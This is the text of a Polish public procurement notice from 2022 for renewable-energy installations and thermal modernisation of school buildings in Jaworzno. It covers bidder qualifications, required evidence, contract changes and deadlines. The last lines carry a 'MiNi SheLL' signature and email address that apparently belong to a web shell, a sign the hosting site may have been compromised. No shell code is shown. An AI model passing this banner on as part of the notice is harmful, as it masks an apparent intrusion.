dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2020 r. poz. 1333 z późn. zm.).<br/>- W związku z art. 117 ust 3 W odniesieniu do warunków dotyczących doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>- W związku z art. 118 ust. 2 ustawy Pzp: W odniesieniu do warunków dotyczących doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>- Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, należy wykazać roboty budowlane, w której Wykonawca bezpośrednio uczestniczył.<br/>- W przypadku robót, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia robót (w przypadku robót rozliczanych wyłącznie w walutach innych niż PLN).<br/><br/>3.4.2 a).<br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub zawodowej, jeżeli Wykonawca wykaże skierowanie do realizacji zamówienia minimum jednej osoby (do pełnienia funkcji kierownika budowy) uprawnionej do pełnienia samodzielnej funkcji technicznej do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane( t.j. Dz. U z 2021 r poz 2351 z póżn. zm) i Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r., poz. 831) lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. <br/>3.4.2.b) . <br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub zawodowej, jeżeli Wykonawca wykaże skierowanie do realizacji zamówienia minimum jednej osoby (do pełnienia funkcji kierownika robót) uprawnionej do pełnienia samodzielnej funkcji technicznej do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane( t.j. Dz. U z 2021 r poz 2351 z póżn. zm) i Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r., poz. 831)lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. <br/>UWAGA :<br/>- W związku z art. 117 ust 3 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>- W związku z art. 118 ust. 2 ustawy Pzp: W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- w celu wykazania spełniania warunku z Rozdział 19 ust. 3.3 SWZ:<br/>1). informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>- w celu wykazania spełniania warunku z Rozdział 19 ust. 3.4.1SWZ:<br/>2).WYKAZ ROBÓT BUDOWLANYCH, wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy te roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. <br/><br/>UWAGA: dowodami, o których mowa, są REFERENCJE bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- inne odpowiednie dokumenty(§ 9 ust.1pkt 1 rozporządzenia o podmiotowych środkach dowodowych).<br/>UWAGA :Wykaz robót budowlanych będzie musiał być sporządzony i podpisany przez ten podmiot, który spełnia dany warunek, czyli odpowiednio przez wykonawcę lub uczestnika konsorcjum lub podmiot udostępniający zasoby.<br/>UWAGA: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonanych wspólnie z innymi wykonawcami, powyższy wykaz może dotyczyć tylko robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył. (§ 9 ust. 3 pkt 1Rozporządzenia o podmiotowych środkach dowodowych)<br/><br/>	- w celu wykazania spełniania warunku z Rozdziału 19 ust. 3.4.2. SWZ<br/>3). WYKAZ OSÓB, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do wykonana zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami. <br/>UWAGA: Wykaz osób będzie musiał być sporządzony i podpisany przez ten podmiot, który spełnia dany warunek, czyli odpowiednio przez wykonawcę lub uczestnika konsorcjum lub podmiot udostępniający zasoby.<br/>UWAGA: Wykonawca, który polega na zdolnościach innych podmiotów (na podmiocie udostępniającym zasoby) w celu spełnienia powyższych warunków musi wraz z ofertą złożyć Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy, (o którym mowa w Rozdziale 16 ust. 3.5 SWZ) potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (o ile Wykonawca korzysta ze zdolności innych podmiotów na zasadach określonych w art. 118 ustawy Pzp.).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zgodnie z art. 101 ust 4 ustawy Pzp. jeżeli w OPZ (opisie przedmiotu zamówienia) jest odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych o których mowa w art. 101 ust. 1 pkt 2 oraz art. 101 ust. 3 ustawy Pzp Zamawiający wskazuje, że dopuszcza rozwiązania równoważne opisywanym i należy przyjąć że odniesieniu takiemu towarzyszy wyraz „lub równoważny”. Wykonawca zobowiązany jest do udowodnienia w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104-107 ustawy Pzp., że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w OPZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych.<br/>Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty:<br/>Jeżeli Wykonawca do wykonania przedmiotu zamówienia zastosuje rozwiązania równoważne w stosunku do tych opisanych przez Zamawiającego w OPZ zgodnie z art. 101 ust. 4 ustawy Pzp, to Wykonawca zobowiązany jest w ust 12 Formularza Oferty (Załącznik Nr 1 do SWZ) wpisać czego rozwiązania równoważne dotyczą, wypisać przedmiotowe środki dowodowe jakie dołącza do formularza oferty oraz złożyć je razem z ofertą. <br/>Jeżeli Wykonawca nie złoży ww. Przedmiotowych Środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne (nie potwierdzając w ten sposób równoważności oferty w zakresie opisanym w opisie przedmiotu zamówienia), Zamawiający będzie wzywał do ich złożenia lub uzupełnienia w wyznaczonym terminie. Wezwanie będzie dotyczyło jedynie przedmiotowych środków dowodowych wpisanych przez Wykonawcę do Formularza Ofertowego w ust. 12 tego Formularza. (zgodnie z art. 107 ust. 2 ustawy Pzp). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/><br/>3.	W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców Oświadczenie, o którym mowa w art. 125 ustawy Pzp (ust. 3.1.Rozdziału 16 SWZ-) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie (na Załączniku Nr 2a). Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż:<br/>3.1.Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3.2.Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/><br/>4.	Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5.	W przypadku, o którym mowa w art. 117 ust. 2 lub ust. 3 ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do oferty Oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy (Załącznik Nr 6 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przewidywane zmiany postanowień umowy opisano w §16, §16a, §16b, §16c Projektowanych Postanowień Umownych (Załacznik Nr 3 do SWZ) :<br/>§ 16<br/> Zmiany umowy<br/>1. Zamawiający przewiduje zmiany wysokości wynagrodzenia w przypadku: <br/>1) w przypadku konieczność zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.<br/>- w przypadku wystąpienia w/w okoliczności skutkujących koniecznością zmiany umowy Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany. Z okoliczności stanowiących podstawę zmiany do umowy strony sporządzą protokół podpisany przez obie strony.<br/>2. Zamawiający przewiduje zmiany terminu realizacji zamówieniaw przypadku:<br/>1) przestojów i opóźnień zawinionych przez Zamawiającego, <br/>2) działania siły wyższej rozumianej zgodnie z § 16a niniejszej umowy.<br/>3) wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót- fakt ten musi zostać udokumentowany wpisem kierownika budowy do dziennika budowy oraz zgłoszony niezwłocznie Zamawiającemu i musi zostać potwierdzony przez inspektora nadzoru,<br/>4) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,<br/>5) wystąpienia nieprzewidzianych okoliczności związanych ze zmianą prawa (zarówno prawa krajowego jak i prawa Unii Europejskiej, w przepisach i standardach lub innych przepisach, bądź zmiana przepisów zostanie opublikowana w Dzienniku Ustaw, która to zmiana będzie miała wpływ na wykonanie umowy i konieczne będzie wprowadzenie zmian w wykonywanej umowie) <br/>- w przypadku wystąpienia w/w okoliczności skutkujących koniecznością zmiany umowy Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany. Z okoliczności stanowiących podstawę zmiany do umowy strony sporządzą protokół podpisany przez obie strony.<br/>- Opóźnienia, o których mowa powyżej muszą być odnotowane w dzienniku budowy, udokumentowane stosownymi protokołami podpisanymi przez kierownika budowy , Inspektora Nadzoruoraz zaakceptowane przez Zamawiającego. W przypadkach wystąpienia opóźnień, Strony ustalą nowe terminy, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi przerwy lub postoju.<br/>3.Zamawiający przewiduje zmiany Umowy w przypadku:<br/>1) Zmiana rachunku bankowego Wykonawcy, który jest zgodny z rachunkiem bankowym przypisanym mu w wykazie podmiotów zarejestrowanych jako podatnicy VAT.<br/>2) Zmiany Kierownika Budowy i Kierownika Robót Wykonawcy. Zmiana musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnej akceptacji Zamawiającego. Osoba proponowana na zamianę winna posiadać uprawnienia zawodowe co najmniej równoważne z uprawnieniami wymaganymi przez Zamawiającego. <br/>3) Poprawy jakości lub innych parametrów charakterystycznych dla danego elementu robot budowlanych, dostaw lub zmiana technologii.<br/>4) Aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny bądź zmiany obowiązujących przepisów lub konieczność opracowania ekspertyz, opinii.<br/>5)zmiany będącej wynikiem zmiany promesy o dofinansowanie udzielonej przez Instytucję Współfinansującą w zakresie terminów (w tym terminu rzeczowej realizacji projektu) lub wysokości i warunków płatności dofinansowania realizacji projektu stanowiącego przedmiot niniejszej umowy.<br/>- W przypadku wystąpienia w/w okoliczności skutkujących koniecznością zmiany umowy Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany. Z okoliczności stanowiących podstawę zmiany do umowy strony sporządzą protokół podpisany przez obie strony.<br/><br/>§ 16a<br/>Siła Wyższa ... <br/>Ciąg dalszy w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem PLATFORMY PRZETARGOWEJ, na której prowadzone jest postępowanie.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-13 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający uzyskał od Banku Gospodarstwa Krajowego Wstępną Promesę Nr 01/2021/1318/PolskiLad dotyczącą Dofinansowania Inwestycji z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych, z przeznaczeniem na realizację przez Zamawiającego Inwestycji pn. <br/>&#34;„Budowa Instalacji OZE wraz z termomodernizacją budynków oświatowych w Jaworznie”<br/><br/>Wykonawca podlega wykluczeniu nie tylko w przypadkami o których mowa w art. 108 ust. 1 pkt 1-6 Ustawy Pzp ale również w przypadkach, o których mowa w art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U.z 2022 poz. 835)

Creat By MiNi SheLL
Email: jattceo@gmail.com